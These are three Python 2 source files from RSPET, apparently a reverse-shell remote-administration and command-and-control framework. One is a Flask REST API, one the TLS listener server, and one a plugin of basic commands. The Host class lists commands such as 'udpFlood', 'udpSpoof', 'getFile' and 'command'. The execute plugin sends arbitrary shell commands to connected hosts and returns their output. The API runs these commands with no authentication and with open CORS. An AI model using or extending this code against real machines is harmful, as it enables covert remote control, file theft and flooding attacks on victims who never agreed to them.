#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
"""RSPET Server's RESTful API."""
import argparse
from flask_cors import CORS, cross_origin
from flask import Flask, jsonify, abort, make_response, request, url_for, redirect
import rspet.server.base

__author__ = "Kolokotronis Panagiotis"
__copyright__ = "Copyright 2016, Kolokotronis Panagiotis"
__credits__ = ["Kolokotronis Panagiotis"]
__license__ = "MIT"
__version__ = "1.1"
__maintainer__ = "Kolokotronis Panagiotis"


APP = Flask(__name__)
CORS(APP)

# TODO:
# There's a handful of commands there is no point whatsoever in executing through here
# so in lack of a better solution (that will come in following versions) lets' do this.
EXCLUDED_FUNCTIONS = ["help", "List_Sel_Hosts", "List_Hosts", "Choose_Host", "Select",\
                        "ALL", "Exit", "Quit"]
# PARSER = argparse.ArgumentParser(description='RSPET Server module.')
# PARSER.add_argument("-c", "--clients", nargs=1, type=int, metavar='N',
#                     help="Number of clients to accept.", default=[5])
# PARSER.add_argument("--ip", nargs=1, type=str, metavar='IP',
#                     help="IP to listen for incoming connections.",
#                     default=["0.0.0.0"])
# PARSER.add_argument("-p", "--port", nargs=1, type=int, metavar='PORT',
#                     help="Port number to listen for incoming connections.",
#                     default=[9000])
# ARGS = PARSER.parse_args()
# RSPET_API = rspet_server.API(ARGS.clients[0], ARGS.ip[0], ARGS.port[0])
RSPET_API = None


def make_public_host(host, h_id):
    """Add full URI to host Dictionary"""
    new_host = host
    new_host['uri'] = url_for('get_host', host_id=h_id, _external=True)
    new_host['id'] = h_id
    return new_host


def make_public_help(command, hlp_sntx):
    """Add full URI to help Dictionary"""
    new_command = hlp_sntx
    new_command['uri'] = url_for('command_help', command=command, _external=True)
    new_command['command'] = command
    return new_command


def shutdown_server():
    """Shutdown server if running on werkzeug"""
    func = request.environ.get('werkzeug.server.shutdown')
    if func is None:
        raise RuntimeError('Not running with the Werkzeug Server')
    func()


@APP.errorhandler(500)
def int_server_error(error):
    """Return JSONified 500"""
    return make_response(jsonify({'error': 'Internal Server Error'}), 500)


@APP.errorhandler(404)
def not_found(error):
    """Return JSONified 404"""
    return make_response(jsonify({'error': 'Not found'}), 404)


@APP.errorhandler(400)
def bad_request(error):
    """Return JSONified 400"""
    return make_response(jsonify({'error': 'Bad request'}), 400)


@APP.route('/rspet/api/v1.1/hosts', methods=['GET'])
def get_hosts():
    """Return all hosts."""
    #Check for query string, redirect to endpoint with trailling '/'.
    if request.query_string:
        return redirect(url_for('run_cmd') + '?' + request.query_string)
    hosts = RSPET_API.get_hosts()
    return jsonify({'hosts': [make_public_host(hosts[h_id], h_id) for h_id in hosts]})


@APP.route('/rspet/api/v1.1/hosts/<string:host_id>', methods=['GET'])
def get_host(host_id):
    """Return specific host."""
    #Check for query string, redirect to endpoint with trailling '/'.
    if request.query_string:
        return redirect(url_for('run_cmd_host', host_id=host_id) + '?' + request.query_string)
    hosts = RSPET_API.get_hosts()
    try:
        host = hosts[host_id]
    except KeyError:
        abort(404)
    return jsonify(make_public_host(host, host_id))


@APP.route('/rspet/api/v1.1/hosts/<string:host_id>/', methods=['GET'])
def run_cmd_host(host_id):
    """Execute host specific command."""
    #Select host on the server.
    res = RSPET_API.select([host_id])
    #Check if host selected correctly (if not probably host_id is invalid).
    if res["code"] != rspet.server.base.ReturnCodes.OK:
        abort(404)
    #Read 'command' argument from query string.
    comm = request.args.get('command')
    if not comm or comm in EXCLUDED_FUNCTIONS:
        abort(400)
    try:
        #Read 'args' argument from query string.
        args = request.args.getlist('args')
        #Cast arguments to string.
        for i, val in enumerate(args):
            args[i] = str(val)
    except KeyError:
        args = []
    #Execute command.
    res = RSPET_API.call_plugin(comm, args)
    #Unselect host. Maintain statelessness of RESTful.
    RSPET_API.select()
    return jsonify(res)


@APP.route('/rspet/api/v1.1/hosts/', methods=['GET'])
def mul_cmd():
    """Execute command on multiple hosts."""
    #Read 'hosts' argument from query string.
    hosts = request.args.getlist('hosts')
    #If no host specified abort with error code 400.
    if not hosts:
        abort(400)
    #Select hosts on the server.
    res = RSPET_API.select(hosts)
    #Check if host selected correctly (if not probably host_id is invalid).
    if res["code"] != rspet.server.base.ReturnCodes.OK:
        abort(404)
    #Read 'command' argument from query string.
    comm = request.args.get('command')
    if not comm or comm in EXCLUDED_FUNCTIONS:
        abort(400)
    try:
        #Read 'args' argument from query string.
        args = request.args.getlist('args')
        #Cast arguments to string.
        for i, val in enumerate(args):
            args[i] = str(val)
    except KeyError:
        args = []
    #Execute command.
    res = RSPET_API.call_plugin(comm, args)
    #Unselect host. Maintain statelessness of RESTful.
    RSPET_API.select()
    return jsonify(res)


@APP.route('/rspet/api/v1.1', methods=['GET'])
def run_cmd():
    """Execute general (non-host specific) command."""
    #Read 'command' argument from query string.
    comm = request.args.get('command')
    if not comm or comm in EXCLUDED_FUNCTIONS:
        abort(400)
    try:
        #Read 'args' argument from query string.
        args = request.args.getlist('args')
        #Cast arguments to string.
        for i, val in enumerate(args):
            args[i] = str(val)
    except KeyError:
        args = []
    #Execute command.
    ret = RSPET_API.call_plugin(comm, args)
    if ret['code'] == rspet.server.base.ReturnCodes.OK:
        http_code = 200
    else:
        http_code = 404
    return make_response(jsonify(ret), http_code)


@APP.route('/rspet/api', methods=['GET'])
def sitemap():
    """Return API map."""
    rat = []
    for rule in APP.url_map.iter_rules():
        uri = str(rule)
        if 'static' in uri:
            continue
        rat.append({'uri':uri, 'doc':globals()[rule.endpoint].__doc__,\
                    'methods':list(rule.methods)})
    return jsonify(rat)


@APP.route('/rspet/api/v1.1/help', methods=['GET'])
def general_help():
    """Return general help."""
    hlp_sntx = RSPET_API.help()
    #Read 'state' argument from query string.
    cur_state = request.args.get('state')
    #Remove excluded functions.
    for hlp in EXCLUDED_FUNCTIONS:
        if hlp in hlp_sntx:
            hlp_sntx.pop(hlp)
    #Remove out of scope functions.
    tmp = {}
    for hlp in hlp_sntx:
        if cur_state in hlp_sntx[hlp]['states']:
            tmp[hlp] = hlp_sntx[hlp]
    return jsonify({'commands': [make_public_help(command, hlp_sntx[command])\
                    for command in tmp]})


@APP.route('/rspet/api/v1.1/help/<string:command>', methods=['GET'])
def command_help(command):
    """Return command specific help."""
    hlp_sntx = RSPET_API.help()
    if command in EXCLUDED_FUNCTIONS:
        abort(400)
    try:
        help_cm = hlp_sntx[command]
    except KeyError:
        abort(404)
    return jsonify(make_public_help(command, help_cm))


@APP.route('/rspet/api/v1.1/plugins/available', methods=['GET'])
def available_plugins():
    """Low-level interaction. Get available plugins."""
    server = RSPET_API.get_server()
    avail_plug = server.available_plugins()
    return jsonify(avail_plug)


@APP.route('/rspet/api/v1.1/plugins/installed', methods=['GET'])
def installed_plugins():
    """Low-level interaction. Get installed plugins."""
    server = RSPET_API.get_server()
    inst_plug = server.installed_plugins()
    return jsonify(inst_plug)


@APP.route('/rspet/api/v1.1/plugins/loaded', methods=['GET'])
def loaded_plugins():
    """Low-level interaction. Get loaded plugins."""
    server = RSPET_API.get_server()
    load_plug = server.loaded_plugins()
    return jsonify(load_plug)


@APP.route('/rspet/api/v1.1/plugins/install', methods=['GET'])
def install_plugin():
    """Low-level interaction. Install plugins."""
    plugins = request.args.getlist('plugins')
    server = RSPET_API.get_server()
    for plugin in plugins:
        server.install_plugin(plugin)
    return make_response('', 204)


@APP.route('/rspet/api/v1.1/plugins/load', methods=['GET'])
def load_plugin():
    """Low-level interaction. Load plugins."""
    plugins = request.args.getlist('plugins')
    server = RSPET_API.get_server()
    for plugin in plugins:
        server.load_plugin(plugin)
    return make_response('', 204)


@APP.route('/rspet/api/v1.1/refresh', methods=['GET'])
def refresh():
    """Refresh server. Check for lost hosts."""
    RSPET_API.refresh()
    return make_response('', 204)


@APP.route('/rspet/api/v1.1/quit', methods=['GET'])
def shutdown():
    """Shutdown the Server."""
    RSPET_API.quit()
    shutdown_server()
    print 'Server shutting down...'
    return make_response('', 204)

def main():
    global RSPET_API
    PARSER = argparse.ArgumentParser(description='RSPET Server module.')
    PARSER.add_argument("-c", "--clients", nargs=1, type=int, metavar='N',
                        help="Number of clients to accept.", default=[5])
    PARSER.add_argument("--ip", nargs=1, type=str, metavar='IP',
                        help="IP to listen for incoming connections.",
                        default=["0.0.0.0"])
    PARSER.add_argument("-p", "--port", nargs=1, type=int, metavar='PORT',
                        help="Port number to listen for incoming connections.",
                        default=[9000])
    ARGS = PARSER.parse_args()
    RSPET_API = rspet.server.base.API(ARGS.clients[0], ARGS.ip[0], ARGS.port[0])
    APP.run(debug=False, threaded=True)


if __name__ == '__main__':
    main()
    # APP.run(debug=False, threaded=True)



#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
"""rspet_server.py: RSPET's Server-side script."""
from __future__ import print_function
import os.path
import ssl
import argparse
import json
from sys import exit as sysexit
from socket import socket, AF_INET, SOCK_STREAM
from socket import error as sock_error
from socket import SHUT_RDWR
from urllib2 import urlopen, HTTPError
from datetime import datetime
from oscrypto import asymmetric
from certbuilder import CertificateBuilder, pem_armor_certificate
from thread import start_new_thread
#from threading import Thread # Will bring back at some point
from rspet.server.Plugins.mount import Plugin
import rspet.server.tab as tab


__author__ = "Kolokotronis Panagiotis"
__copyright__ = "Copyright 2016, Kolokotronis Panagiotis"
__credits__ = ["Kolokotronis Panagiotis", "Dimitris Zervas"]
__license__ = "MIT"
__version__ = "0.4.0"
__maintainer__ = "Kolokotronis Panagiotis"
__path__ = os.path.dirname(__file__)

class ReturnCodes(object):
    """Enumeration containing the Return Codes of the Server."""
    OK, InvalidSyntax, SocketError, LocalAccessError, RemoteAccessError = range(5)
    OutOfScope, CommandNotFound, InvalidHostID = range(5, 8)


class API(object):
    """Define RSPET Server's Api."""
    def __init__(self, max_conns, ip, port):
        """Initialize Server object."""
        self.server = Server(max_conns, ip, port)

    def call_plugin(self, command, args=[]):
        """Call a plugin command"""
        try:
            ret = self.server.execute(command, args)
        except KeyError:
            ret = [None, 6, ("%s : No such command." %command)]
        return {"transition":ret[0],
                "code":ret[1],
                "string":ret[2]}

    def select(self, args=[]):
        """Manage host selection."""
        ret = self.server.select(args)
        return {"transition":None,
                "code":ret[0],
                "string":ret[1]}

    def help(self):
        """
        Temporary. Should interface Server's help when Circular references are removed.
        """
        help_dct = {}

        for cmd in Plugin.__server_cmds__:
            help_dct[cmd] = {'help':Plugin.__server_cmds__[cmd].__help__,
                             'syntax':None,
                             'states':Plugin.__cmd_states__[cmd]}
            try:
                help_dct[cmd]["syntax"] = Plugin.__server_cmds__[cmd].__syntax__
            except AttributeError:
                pass

        return help_dct

    def refresh(self):
        """Interface Server object's clean function."""
        self.server.clean()

    def get_server(self):
        """Return the instance of Server object for low level API."""
        return self.server

    def get_hosts(self):
        """Return hosts by ID."""
        hosts = self.server.get_hosts()
        ret = {}
        for h_id in hosts:
            host = hosts[h_id]
            ret[h_id] = {"ip":host.get_ip(),
                         "port":host.get_port(),
                         "version":str(host.get_version()),
                         "type":str(host.get_type()),
                         "system":str(host.get_systemtype()),
                         "hostname":str(host.get_hostsname())}
        return ret

    def quit(self):
        """Quit API and Destroy Server instance."""
        self.server.trash()


class Console(object):
    """Provide command line interface for the server."""
    prompt = "~$ " # Current command prompt.
    states = {} # Dictionary that defines available states.
    state = "basic" #CLI "entry" state.

    def __init__(self, max_conns, ip, port):
        """Start server and initialize states."""
        self.server = Server(max_conns, ip, port)
        #If done directly @ Class attributes, Class funcs are not recognised.
        Console.states['basic'] = Console._basic
        Console.states['connected'] = Console._connected
        Console.states['multiple'] = Console._multiple
        Console.states['all'] = Console._all

    def trash(self):
        """Delete Console."""
        self.server.trash()

    def loop(self):
        """Main CLI loop"""
        self._logo()
        tab.readline_completer(c.title()
                for c in Plugin.__cmd_states__.keys())

        while not self.server.quit_signal:
            try:
                cmd = raw_input(Console.prompt).lower()
            except (KeyboardInterrupt, EOFError):
                raise KeyboardInterrupt

            cmdargs = cmd.split(" ")
            #"Sanitize" user input by stripping spaces.
            cmdargs = [x for x in cmdargs if x != ""]
            if cmdargs == []: #Check if command was empty.
                continue
            cmd = cmdargs[0]
            del cmdargs[0]
            #Execute command.
            try:
                if Console.state in Plugin.__cmd_states__[cmd]:
                    results = self.server.execute(cmd, cmdargs)
                else:
                    results = [None, 5, "Command used out of scope."]
            except KeyError:
                results = [None, 6, "Command not found. Try help for a list of all commands!"]
            tmp_state = results[0]
            #return_code = results[1] # Future use ? Also API.
            return_string = results[2]
            if return_string != "":
                print(return_string)
            try:
                Console.states[tmp_state](self) #State transition.
            except KeyError: #If none is returned make no state change.
                continue
        self.server.trash()

    def _basic(self):
        self.server.clean()
        self.server.select([])
        Console.prompt = "~$ "
        Console.state = "basic"

    def _connected(self):
        try:
            Console.prompt = "[%s]~$ " % self.server.get_selected()[0].get_ip()
        except IndexError:
            pass
        else:
            Console.state = "connected"

    def _multiple(self):
        if len(self.server.get_selected()) != 0:
            Console.prompt = "[MULTIPLE]~$ "
            Console.state = "multiple"

    def _all(self):
        if len(self.server.get_selected()) != 0:
            Console.prompt = "[ALL]~$ "
            Console.state = "multiple"

    def _logo(self):
        """Print logo and Authorship/License."""
        print(r"#####################################################")
        print(r"__________  _________________________________________")
        print(r"\______   \/   _____/\______   \_   _____/\__    ___/")
        print(r" |       _/\_____  \  |     ___/|    __)_   |    |   ")
        print(r" |    |   \/        \ |    |    |        \  |    |   ")
        print(r" |____|_  /_______  / |____|   /_______  /  |____|   ")
        print(r"        \/        \/                   \/            ")
        print(r"")
        print(r" -Author: panagiks (http://panagiks.xyz)")
        print(r" -Co-Author: dzervas (http://dzervas.gr)")
        print(r" -Licence: MIT @ panagiks")
        print(r"#####################################################")
        print(r"")


class Server(object):
    """Main class of the server. Manage server socket, selections and call plugins."""
    #hosts = [] # List of hosts
    #selected = [] # List of selected hosts
    #plugins = [] # List of active plugins
    #config = {} # Reserved for future use (dynamic plug-in loading).

    def __init__(self, max_conns=5, ip="0.0.0.0", port="9000"):
        """Start listening on socket."""
        ################# Replaced with dict named connection. #################
        self.connection = {}
        self.connection["ip"] = ip
        self.connection["port"] = port
        self.connection["max_conns"] = max_conns
        self.connection["sock"] = socket(AF_INET, SOCK_STREAM)
        ########################################################################
        self.quit_signal = False
        ################### Replaced with dict named clients. ##################
        self.clients = {}
        self.clients["hosts"] = {} # Dictionary of hosts
        self.clients["selected"] = [] # List of selected hosts
        self.clients["serial"] = 0
        ########################################################################
        self.log_opt = [] # List of Letters. Indicates logging level
        ################### Replaced with dict named plugins. ##################
        self.plugins = {}
        self.plugins["loaded"] = {} # List of loaded plugins
        self.plugins["installed"] = self.installed_plugins() # List of installed plugins
        self.plugins["available"] = {} # List of available plugins
        self.plugins["base_url"] = ""
        ########################################################################
        with open(os.path.join(__path__, "config.json")) as json_config:
            self.config = json.load(json_config)
        ######################### Certificate handling #########################
        if 'certs' not in self.config:
            self.config['certs'] = {}
            crt_fl = os.path.join(__path__, 'server.crt')
            key_fl = os.path.join(__path__, 'server.key')
            if not (os.path.isfile(crt_fl) and os.path.isfile(key_fl)):
                public_key, private_key = asymmetric.generate_pair('rsa', bit_size=4096)
                with open(key_fl, 'wb') as key:
                    key.write(asymmetric.dump_private_key(private_key, None))
                builder = CertificateBuilder(
                    {
                        u'country_name': u'RT',
                        u'state_or_province_name': u'RT',
                        u'locality_name': u'RT',
                        u'organization_name': u'RT',
                        u'common_name': u'RT',
                    },
                    public_key
                )
                builder.self_signed = True
                certificate = builder.build(private_key)
                with open(crt_fl, 'wb') as crt:
                    crt.write(pem_armor_certificate(certificate))
            self.config['certs']['crt'] = crt_fl
            self.config['certs']['key'] = key_fl
        ########################################################################
        self.log_opt = self.config["log"]
        self.plugins["base_url"] = self.config["plugin_base_url"]
        self._log("L", "Session Start.")
        for plugin in self.config["plugins"]:
            self.load_plugin(plugin)
        try:
            self.connection["sock"].bind((self.connection["ip"],
                                          int(self.connection["port"])))
            self.connection["sock"].listen(self.connection["max_conns"])
            self._log("L", "Socket bound @ %s:%s." %(self.connection["ip"],
                                                     self.connection["port"]))
        except sock_error:
            print("Something went wrong during binding & listening")
            self._log("E", "Error binding socket @ %s:%s." %(self.connection["ip"],
                                                             self.connection["port"]))
            sysexit()
        start_new_thread(self.loop, ())

    def trash(self):
        """Safely closes all sockets"""
        for host in self.clients["hosts"]:
            self.clients["hosts"][host].trash()
        self.clean()
        self.select([])
        self.connection["sock"].close()

    def _log(self, level, action):
        if level not in self.log_opt:
            return
        timestamp = datetime.now()
        with open(os.path.join(__path__, "log.txt"), 'a') as logfile:
            logfile.write("%s : [%s/%s/%s %s:%s:%s] => %s\n" %(level,
                                                               str(timestamp.day),
                                                               str(timestamp.month),
                                                               str(timestamp.year),
                                                               str(timestamp.hour),
                                                               str(timestamp.minute),
                                                               str(timestamp.second),
                                                               action))

    def loop(self):
        """Main server loop for accepting connections. Better call it on its own thread"""
        while True:
            try:
                (csock, (ipaddr, port)) = self.connection["sock"].accept()
                self._log("L", "New connection from %s:%s" % (str(ipaddr),
                                                              str(port)))
            except sock_error:
                raise sock_error
            try:
                csock = ssl.wrap_socket(csock, server_side=True,
                                        certfile=self.config['certs']['crt'],
                                        keyfile=self.config['certs']['key'],
                                        ssl_version=ssl.PROTOCOL_TLSv1_2)
            except AttributeError: # All PROTOCOL consts are merged on TLS in Python2.7.13
                csock = ssl.wrap_socket(csock, server_side=True,
                                        certfile=self.config['certs']['crt'],
                                        keyfile=self.config['certs']['key'],
                                        ssl_version=ssl.PROTOCOL_TLS)
            self.clients["hosts"][str(self.clients["serial"])] = Host(csock, ipaddr, port,
                                                                      self.clients["serial"])
            self.clients["serial"] += 1

    def load_plugin(self, plugin):
        """Asyncronously load a plugin."""
        if plugin in self.plugins["installed"]:
            try:
                __import__("rspet.server.Plugins.%s" % plugin)
                self._log("L", "%s: plugin loaded." % plugin)
                self.plugins["loaded"][plugin] = self.plugins["installed"][plugin]
            except ImportError:
                self._log("E", "%s: plugin failed to load." % plugin)
        else:
            self._log("E", "%s: plugin not installed" % plugin)

    def install_plugin(self, plugin):
        """Install a plugin from a loaded repo."""
        # Get the url for the plugin Download.
        try:
            plugin_url = self.available_plugins()[plugin]['uri']
        except KeyError:
            self._log("E", "%s: plugin does not exist" % plugin)
        else:
            # Download the plugin and write it to a file.
            try:
                plugin_obj = urlopen(plugin_url)
                plugin_cont = plugin_obj.read()
            except HTTPError: # Plugin repo 404ed (most probably).
                self._log("E", "%s: plugin not available on server." % plugin)
            else:
                with open(os.path.join(__path__, ("Plugins/%s.py" %plugin)), 'w') as plugin_file:
                    plugin_file.write(plugin_cont)
                self._log("L", "%s: plugin installed" % plugin)

    def available_plugins(self):
        """Get a list of all available plugins."""
        # Clean Dictionary.
        self.plugins["available"] = {}
        # Iterate through all enabled repos.
        for base_url in self.plugins["base_url"]:
            # Get info file from repo, in case of error, log and continue.
            try:
                json_file = urlopen(base_url + '/plugins.json')
            except HTTPError: # Plugin repo 404ed (most probably).
                self._log("E", "Error connecting to plugin repo %s" % base_url)
                continue
            json_dct = json.load(json_file)
            # Iterate through plugins available in current repo.
            for plugin in json_dct:
                # Make sure plugin is not already listed from prev repo.
                if plugin not in self.plugins["available"]:
                    self.plugins["available"][plugin] = json_dct[plugin]
                    # Trasform relative uri from json file to absolute.
                    self.plugins["available"][plugin]["uri"] = base_url + \
                                    self.plugins["available"][plugin]["uri"]
        return self.plugins["available"]

    def installed_plugins(self):
        """List all plugins installed."""
        from os import listdir
        from fnmatch import fnmatch
        import compiler
        import inspect
        files = listdir(os.path.join(__path__, 'Plugins'))
        try:
            files.remove('mount.py')
            files.remove('template.py')
        except ValueError:
            pass
        plugins = {}
        for element in files:
            if fnmatch(element, '*.py') and not fnmatch(element, '_*'):
                plug_doc = compiler.parseFile(os.path.join(__path__, 'Plugins/' + element)).doc
                plug_doc = inspect.cleandoc(plug_doc)
                plugins[element[:-3]] = plug_doc # Remove .py)
        return plugins

    def loaded_plugins(self):
        """Interface function. Return loaded plugins."""
        return self.plugins["loaded"]

    def select(self, ids=None):
        """Selects given host(s) based on ids

        Keyword argument:
        ids     -- Array of ids of hosts. Empty array unselects all. None
        selects all
        """
        ret = [0, ""]
        flag = False
        self.clients["selected"] = []
        if ids is None:
            for h_id in self.clients["hosts"]:
                self.clients["selected"].append(self.clients["hosts"][h_id])
        else:
            #self.clients["selected"] = []
            for i in ids:
                i = str(i)
                try:
                    if self.clients["hosts"][i] not in self.clients["selected"]:
                        self.clients["selected"].append(self.clients["hosts"][i])
                except KeyError:
                    flag = True
        if flag:
            ret[0] = 7
            ret[1] = "One or more host IDs were invalid. Continuing with valid hosts ..."
        return ret

    def get_selected(self):
        """Interface function. Return selected hosts."""
        return self.clients["selected"]

    def get_hosts(self):
        """Interface function. Return all hosts."""
        return self.clients["hosts"]

    def execute(self, cmd, args):
        """Execute a command on all selected clients.

        Keyword argument:
        cmd     -- Function to call for each selected host.
        Function signature myfunc(Host, args[0], args[1], ...)
        It should accept len(args) - 1 arguments
        args    -- Arguments to pass to the command function"""

        ret = [None, 0, ""]
        try:
            ret = Plugin.__server_cmds__[cmd](self, args)
        except KeyError:
            raise KeyError
        return ret

    def help(self, args):
        """Print all the commands available in the current interface allong with
        their docsting."""
        help_str = ""

        if len(args) == 0:
            help_str += "Server commands:"
            if Plugin.__server_cmds__ is not None:
                for cmd in Plugin.__server_cmds__:
                    if Console.state in Plugin.__cmd_states__[cmd]:
                        help_str += ("\n\t%s: %s" % (cmd,
                            Plugin.__server_cmds__[cmd].__help__))

        else:
            help_str += ("Command : %s" % args[0])
            try:
                help_str += ("\nSyntax : %s" % Plugin.__server_cmds__[args[0]].__syntax__)
            except KeyError:
                help_str += "\nCommand not found! Try help with no arguments for\
                             a list of all commands available in current scope."
            except AttributeError: # Command has no arguments declared.
                pass
        return help_str

    def clean(self):
        """Remove hosts tagged for deletion."""
        tmp_dct = {}
        for host_id in self.clients["hosts"]:
            if not self.clients["hosts"][host_id].deleteme:
                tmp_dct[host_id] = self.clients["hosts"][host_id]
            elif self.clients["hosts"][host_id] in self.clients["selected"]:
                self.clients["selected"].remove(self.clients["hosts"][host_id])
        self.clients["hosts"] = tmp_dct

    def quit(self):
        """Interface function. Raise a Quit signal."""
        self.quit_signal = True

class Host(object):
    """Class for hosts. Each Host object represent one host"""
    command_dict = {
        'killMe'            : '00000',
        'getFile'           : '00001',
        'getBinary'         : '00002',
        'sendFile'          : '00003',
        'sendBinary'        : '00004',
        'udpFlood'          : '00005',
        'udpSpoof'          : '00006',
        'command'           : '00007',
        'KILL'              : '00008',
        'loadPlugin'        : '00009',
        'unloadPlugin'      : '00010',
        'runPluginCommand'  : '00011'
    }

    def __init__(self, sock, ip, port, h_id):
        """Accept the connection and initialize variables."""
        self.deleteme = False
        ################# Replaced with dict named connection. #################
        self.connection = {}
        self.connection["sock"] = sock
        self.connection["ip"] = ip
        self.connection["port"] = port
        ########################################################################
        self.id = h_id
        #################### Replaced with dict named info. ####################
        self.info = {}
        self.info["version"] = ""
        self.info["type"] = ""
        self.info["systemtype"] = ""
        self.info["hostname"] = ""
        self.info["plugins"] = []
        self.info["commands"] = []
        ########################################################################

        try:
            ###Get Version###
            msg_len = self.recv(2) # len is 2-digit (i.e. up to 99 chars)
            tmp = self.recv(int(msg_len)).split("-")
            self.info["version"] = tmp[0]
            self.info["type"] = tmp[1]
            #################
            ###Get System Type###
            msg_len = self.recv(2) # len is 2-digit (i.e. up to 99 chars)
            self.info["systemtype"] = self.recv(int(msg_len))
            #####################
            ###Get Hostname###
            msg_len = self.recv(2) # len is 2-digit (i.e. up to 99 chars)
            self.info["hostname"] = self.recv(int(msg_len))
            ##################
        except sock_error:
            self.trash()

    def get_ip(self):
        """Interface function. Return Client's IP address."""
        return self.connection["ip"]

    def get_port(self):
        """Interface function. Return Client's port."""
        return self.connection["port"]

    def get_version(self):
        """Interface function. Return Client Module's version."""
        return self.info["version"]

    def get_type(self):
        """Interface function. Return the type of the Client Module."""
        return self.info["type"]

    def get_systemtype(self):
        """Interface function. Retrun the type of the Client's system."""
        return self.info["systemtype"]

    def get_hostsname(self):
        """Interface function. Return Client's hostname."""
        return self.info["hostname"]

    def trash(self):
        """Gracefully delete host."""
        if not self.deleteme:
            try:
                self.send(Host.command_dict['killMe'])
            except sock_error:
                raise sock_error
            self.purge()

    def purge(self):
        """Delete host not so gracefully."""
        self.connection["sock"].shutdown(SHUT_RDWR)
        self.connection["sock"].close()
        self.deleteme = True

    def __eq__(self, other):
        """Check weather two sockets are the same socket."""
        #Why is this here ?
        return self.connection["sock"] == other.connection["sock"]

    def send(self, msg):
        """Send message to host"""
        if msg is not None and len(msg) > 0:
            try:
                self.connection["sock"].send(msg)
            except sock_error:
                raise sock_error

    def recv(self, size=1024):
        """Receive from host"""
        if size > 0:
            data = self.connection["sock"].recv(size)
            if data == '':
                raise sock_error
            return data


def main():
    """Main function."""
    parser = argparse.ArgumentParser(description='RSPET Server module.')
    parser.add_argument("-c", "--clients", nargs=1, type=int, metavar='N',
                        help="Number of clients to accept.", default=[5])
    parser.add_argument("--ip", nargs=1, type=str, metavar='IP',
                        help="IP to listen for incoming connections.",
                        default=["0.0.0.0"])
    parser.add_argument("-p", "--port", nargs=1, type=int, metavar='PORT',
                        help="Port number to listen for incoming connections.",
                        default=[9000])
    args = parser.parse_args()
    cli = Console(args.clients[0], args.ip[0], args.port[0])
    try:
        cli.loop()
    except KeyError:
        print("Got KeyError")
        cli.trash()
        del cli
        sysexit()
    except KeyboardInterrupt:
        cli.trash()
        del cli
        sysexit()
    cli.trash()
    del cli


if __name__ == "__main__":
    main()



"""
Plug-in module for RSPET server. Offer functions essential to server.
"""
from __future__ import print_function
from socket import error as sock_error
from urllib2 import urlopen, HTTPError
from rspet.server.Plugins.mount import Plugin, command

class Essentials(Plugin):
    """
    Class expanding Plugin.
    """

    @command("basic", "connected", "multiple")
    def help(self, server, args):
        """List commands available in current state or provide syntax for a command.

        Help: [command]"""
        ret = [None, 0, ""]
        if len(args) > 1:
            ret[2] = ("Syntax : %s" % self.__server_cmds__["help"].__syntax__)
            ret[1] = 1 #Invalid Syntax Error Code
        else:
            ret[2] = server.help(args)
        return ret

    @command("basic")
    def list_hosts(self, server, args):
        """List all connected hosts."""
        ret = [None, 0, ""]
        hosts = server.get_hosts()
        if hosts:
            ret[2] += "Hosts:"
            for i in hosts:
                inf = hosts[i].info
                con = hosts[i].connection
                ret[2] += ("\n[%s] %s:%s %s-%s %s %s" % (i, con["ip"], con["port"],
                                                         inf["version"], inf["type"],
                                                         inf["systemtype"],
                                                         inf["hostname"]))
        else:
            ret[2] += "No hosts connected to the Server."
        return ret

    @command("connected", "multiple")
    def list_sel_hosts(self, server, args):
        """List selected hosts."""
        ret = [None, 0, ""]
        hosts = server.get_selected()
        ret[2] += "Selected Hosts:"
        for host in hosts:
            #tmp = hosts[i]
            inf = host.info
            con = host.connection
            ret[2] += ("\n[%s] %s:%s %s-%s %s %s" % (host.id, con["ip"], con["port"],
                                                     inf["version"], inf["type"],
                                                     inf["systemtype"],
                                                     inf["hostname"]))
        return ret

    @command("basic")
    def choose_host(self, server, args):
        """Select a single host.

        Help: <host ID>"""
        ret = [None, 0, ""]
        if len(args) != 1 or not args[0].isdigit():
            ret[2] = ("Syntax : %s" % self.__server_cmds__["choose_host"].__syntax__)
            ret[1] = 1 #Invalid Syntax Error Code
        else:
            ret[1], ret[2] = server.select([args[0]])
            ret[0] = "connected"
        return ret

    @command("basic")
    def select(self, server, args):
        """Select multiple hosts.

        Help: <host ID> [host ID] [host ID] ..."""
        ret = [None, 0, ""]
        if len(args) == 0:
            ret[2] = ("Syntax : %s" % self.__server_cmds__["select"].__syntax__)
            ret[1] = 1 #Invalid Syntax Error Code
        else:
            ret[1], ret[2] = server.select(args)
            ret[0] = "multiple"
        return ret

    @command("basic")
    def all(self, server, args):
        """Select all hosts."""
        ret = [None, 0, ""]
        ret[1], ret[2] = server.select(None)
        ret[0] = "all"
        return ret

    @command("connected", "multiple")
    def exit(self, server, args):
        """Unselect all hosts."""
        ret = [None, 0, ""]
        ret[0] = "basic"
        return ret

    @command("basic")
    def quit(self, server, args):
        """Quit the CLI and terminate the server."""
        ret = [None, 0, ""]
        server.quit()
        return ret

    @command("connected", "multiple")
    def close_connection(self, server, args):
        """Kick the selected host(s)."""
        ret = [None, 0, ""]
        hosts = server.get_selected()
        for host in hosts:
            try:
                host.trash()
            except sock_error:
                pass
        ret[0] = "basic"
        return ret

    @command("connected")
    def kill(self, server, args):
        """Stop host(s) from doing the current task."""
        ret = [None, 0, ""]
        hosts = server.get_selected()
        for host in hosts:
            try:
                host.send(host.command_dict['KILL'])
            except sock_error:
                host.purge()
                ret[0] = "basic"
                ret[1] = 2 # Socket Error Code
        return ret

    @command("connected")
    def execute(self, server, args):
        """Execute system command on host.

        Help: <command>"""
        ret = [None, 0, ""]
        host = server.get_selected()[0]
        if len(args) == 0:
            ret[2] = ("Syntax : %s" % self.__server_cmds__["execute"].__syntax__)
            ret[1] = 1 #Invalid Syntax Error Code
        else:
            command = " ".join(args)
            try:
                host.send(host.command_dict['command'])
                host.send("%013d" % len(command))
                host.send(command)
                respsize = int(host.recv(13))
                ret[2] += str(host.recv(respsize))
            except sock_error:
                host.purge()
                ret[0] = "basic"
                ret[1] = 2 # Socket Error Code
        return ret

    ############################################################################
    ###                        Server Plugin Section                         ###
    ############################################################################
    @command("basic")
    def install_plugin(self, server, args):
        """Download an official plugin (Install).

        Help: <plugin> [plugin] [plugin] ..."""
        ret = [None, 0, ""]
        for plugin in args:
            server.install_plugin(plugin)
        return ret

    @command("basic")
    def load_plugin(self, server, args):
        """Load an already installed plugin.

        Help: <plugin> [plugin] [plugin] ..."""
        ret = [None, 0, ""]
        for plugin in args:
            server.load_plugin(plugin)
        return ret

